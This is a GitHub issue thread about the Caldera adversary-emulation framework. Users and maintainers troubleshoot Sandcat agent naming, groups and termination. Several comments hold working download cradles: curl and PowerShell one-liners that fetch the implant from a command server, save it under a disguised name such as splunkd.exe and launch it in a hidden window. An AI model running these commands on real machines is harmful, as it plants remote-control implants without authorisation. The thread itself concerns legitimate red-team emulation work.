### ISSUE TITLE
Problems with agents

### ISSUE THREAD

**Issue by rcaroncd** [mitre/caldera#1586]
Hello,

Using Caldera, I was doing some tests and I had the following problems:

1. I have deployed on 3 Windows machines the Sandcat agent. The executable is downloaded in the 'C:\Users\Public' directory, and, apparently, with the same name always, I don't know if it can generate a random name or similar, because **it is always generated with the name "splunkd.exe"** and that causes me problems in abilities in which I try to deploy another agent (because I don't want to have to check if the file exists to execute it then)

2. I have seen that, in caldera, the red user has a group called "red", but I have not seen **how I can create other groups** to which I can link agents or if I can do this. As well as delete groups.

3. And finally, I had 4 agents (sandcat) deployed in Windows machines and, I was trying to delete one from the platform, with **the option "kill agent" or doing a DELETE through the API. But none of the options works**, that is, the agent does not die in the machine (it does not finish the process) and it keeps on reconnecting after a short time. I try to make the execution end and the communication close.

Thank you very much for the work you are doing and I hope you can help me to solve these problems.

Best regards

**Comment by privateducky** [comment]
1. You can change the downloaded name by adjusting the "implant name" in the agent modal (on the UI -> Campaigns -> Agents). This name is splunkd.exe by default. Alternatively, you can have 54ndc47 select a random name altogether by utilizing the filename header passed back to the downloader upon request. Here's an example of how we do it on Linux using cURL. @garunagiri may have a PowerShell variant of this available, otherwise you'd need to write your own:
```
server="http://0.0.0.0:8888";agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;nohup ./$agent -server $server &
```

**Comment by privateducky** [comment]
2. You can change groups in the Campaigns -> Agents modal on the UI. Click on the green PID button to open up the agent information portal. From here you can change the group.

**Comment by privateducky** [comment]
@unkempthenry can you shed any debugging light on #3 above?

**Comment by rcaroncd** [comment]
Hello,

I didn't say it before, but I'm trying to do everything via API. Regarding what you've told me:

1. Via UI you can only edit three values "Group", "Sleep" and "Watchdog", but not the "Executable name", nor the "Location". However, what I was asking, is if the name was generated randomly in some way, with some parameter or flag in the request. So I executed the following command (exactly the same as in sandcat psh), but I put, as you said, the "filename" header when making the request, with a custom name but still taking 'splunkd.exe' as the name. The command for linux I haven't tried it, because I'm doing the tests in Windows.

```ps1
$server="http://127.0.0.1:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("filename","mycustomname");
$data=$wc.DownloadData($url);
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
get-process | ? {$_.modules.filename -like "C:\\Users\\Public\\$name.exe"} | stop-process -f;
rm -force "C:\\Users\\Public\\$name.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\\Users\\Public\\$name.exe",$data) | Out-Null;
Start-Process -FilePath C:\\Users\\Public\\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
```

2. I see that you can change the agent's group from the IU, but... can't you create new groups from the API? I'd like to do the following:
  - First, create a group X
  - Second, deploy the sandcat agent on Windows with the network group
  - Third, consult the list of agents
  - And fourth, modify the target agent's group to one of his own


Greetings and thank you!

**Comment by khyberspache** [comment]
@rcaroncd There is a simpler way to handle what you're trying to do:
```Powershell
$file="RandomFile.exe";
$server="http://127.0.0.1:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.DownloadFile($url, $file);
Start-Process -FilePath C:\\Users\\Public\\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
```

**Comment by rcaroncd** [comment]
Yes @khyberspache , I had already contemplated that option, what I was asking was if caldera had already implemented a functionality for randomize the name of the agent that was generated so that I don't have to implement it when deploying agents

**Comment by khyberspache** [comment]
I'll look into the randomized names today.  It's definitely implemented, so there must be a bug.

**Comment by khyberspache** [comment]
@rcaroncd Regarding your download cradle above - here is the actual line of code that sets the name of the file you'd receive on download:
```Python
        if headers.get('name'):
            display_name = headers.get('name')
```
Change:
```Powershell
$wc.Headers.add("filename","mycustomname");
```
to
```Powershell
$wc.Headers.add("name","mycustomname");
```

**Comment by khyberspache** [comment]
@rcaroncd To your second question - groups are just a string field in the agent object (in the backend).  You can create new groups by starting agents with a specified group `-group NEW_GROUP`

**Comment by rcaroncd** [comment]
Perfect, that works well! Thank you very much. So I'm compiling the above points:

1. Solved with the 'name' header.
2. Solved passing the group with '-group' in the agent deployment.
3. I wait (the elimination of agents)

Thank you very much and best regards

**Comment by khyberspache** [comment]
@rcaroncd I just tested the `kill agent` from the UI and didn't have an issue terminating the agent.  Can you provide reproduction steps?

**Comment by unkempthenry** [comment]
Re #3.  

1) Currently, it can takes a couple minutes.  Is it still failing to terminate after waiting for the current max sleep time + 2 minutes? Killing agents piggybacks on the watchdog timer which is measured in minutes, so it can take a couple minutes for the agent to realize it needs to terminate.  We've talked about making it responsive, but it hasn't been a priority yet. 

2) I believe that watchdog and agent killing is only implemented in sandcat right now, so, for example, manx shells will continue to live.

**Comment by rcaroncd** [comment]
@unkempthenry I've taken the following steps:

1. I've gone to the agent section from the red profile in the UI
2. I've clicked on the PID of the agent I want to kill
3. I clicked on the "Kill Agent" button and confirmed the action.
4. I waited 20 minutes, and the agent is still active, both in the IU and in the machine. Keep polling.

**Comment by rcaroncd** [comment]
Ah! I forgot, I also tried via API with the following request:

```
curl -X DELETE 'http://192.168.1.2:8888/api/rest' -H 'Host: localhost:8888' -H 'Content-Type: application/json' -d '{"index":"agents","paw":"zcihvr"}' -H 'KEY: ADMIN123'
```
And I received: `"Delete action completed"`

Same results: no agent removed.

**Comment by unkempthenry** [comment]
Hmmm, I just confirmed that I was able to kill both a linux and windows sandcat agents from the web interface in my test environment.  On windows, I executed multiple agents simultaneously and was able to kill them all via the web interface. 

I did notice that we have a front-end problem, where after you refresh / freshly load a page all agents in the agents table are green and only turn red after the table polls the server.  So the agents table could be making it look like agents are still running when they're not.

1) Can you confirm that the agent process is still alive by looking for its name and pid in task manager?
2) Make sure that the sandcat plugin is up to date.  I just realized that we changed the granularity of one of the timers from minutes to seconds last month -- if you're using a newer version of caldera and an older version of sandcat this could explain why agents aren't terminating. 
2) What version of caldera are you running?
3) What kind of agent and contact is being used (e.g. is it sandcat over http?) 
4) Version of windows?  I'd be surprised if this mattered unless we're running drastically different versions. (For reference I tested against Windows 10 build 10340 ). 

Finally, just to be super clear: using DELETE on an agent via the API won't kill the agent, it will just remove caldera's knowledge of the agent until it beacons again.  So the current process to kill and remove an agent is: 1) kill the agent 2) Wait for the agent to beacon back one more time to get its new configuration 3) DELETE the agent 

Killing the agent can be accomplished either via clicking the 'Kill Agent' button in the UI, or via the API by PUTing `{"index":"agents","paw":"<agent paw>","watchdog":1,"sleep_min":3,"sleep_max":3}`

**Comment by rcaroncd** [comment]
Hi, sorry to keep you waiting, I'm answering your questions:

1. Yes, I can confirm that the agent is still alive on the machine (consulting the task manager) after killing him via UI or via API (with the request you proposed to me)
2. The Sandcat plugin is in the latest version
3. I use the 2.6.6 caldera branch
4. I use the sandcat via http
5. The machine I'm testing on is a Windows Server 2016 build 14393

And regarding the last paragraph, I understand that the DELETE is to simulate the 'X' in the UI, and the PUT with the data is to update the configuration and that, when you do the polling it is updated. If this is correct, what is the function of the "watchdog" field? Because I see that it is set to value 1, and even doing this request, the agent is still alive doing the normal polling.

**Comment by mrengstrom** [comment]
So, the watchdog is a monitor on the agent for successful beaconing.  As was hinted at in Henry's other reply, the value of the watchdog used to be minutes but was changed to seconds a a month or two ago.
So that plays in if you check out the sandcat source code here:
https://github.com/mitre/gocat/blob/c0965168c1aeab61976127cc19572c5463619876/core/core.go#L42
The three things to pay attention to are the watchdog time, checkin time and the location of the evaluation relative to the sleep at the end of the loop.
So, the general logic to kill an agent is to set the sleep time to larger value than the watchdog timer, so that, when you return back up to the top of the loop, the time from last checkin is larger than the watchdog timer, breaking the agent out of its execution loop and shutting it down.

So that may affect you, in that if you were not running the latest agent code, the sleep timer in his example request would be putting the sleep time to 3s and the watchdog timer to 1m, so that would never flag as a condition to halt execution, but in the current code it should as it would correspond to a 1s watchdog and 3s sleep.

**Comment by privateducky** [comment]
lots of various topics going on inside this ticket. closing this as it got a little sideways. please re-open with any specific, remaining bugs.

**Comment by LoaiEsam37** [comment]
### CALDERA's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.

```powershell
PS C:\Users\Public> $server="http://0.0.0.0:8888";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);get-process | ? {$_.modules.filename -like "C:\Users\Public\caldara.exe"} | stop-process -f;rm -force "C:\Users\Public\caldara.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\caldara.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\caldara.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
```

Got this StdErr :-

```powershell
MethodInvocationException: Exception calling "DownloadData" with "1" argument(s): "The requested address is not valid in its context. [::ffff:0:0]:8888 (0.0.0.0:8888)"
MethodInvocationException: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. (Parameter 'bytes')"
Start-Process: This command cannot be run due to the error: An error occurred trying to start process 'C:\Users\Public\caldara.exe' with working directory 'C:\Users\Public'. The system cannot find the file specified.
```

**Can anyone help me ?!?**
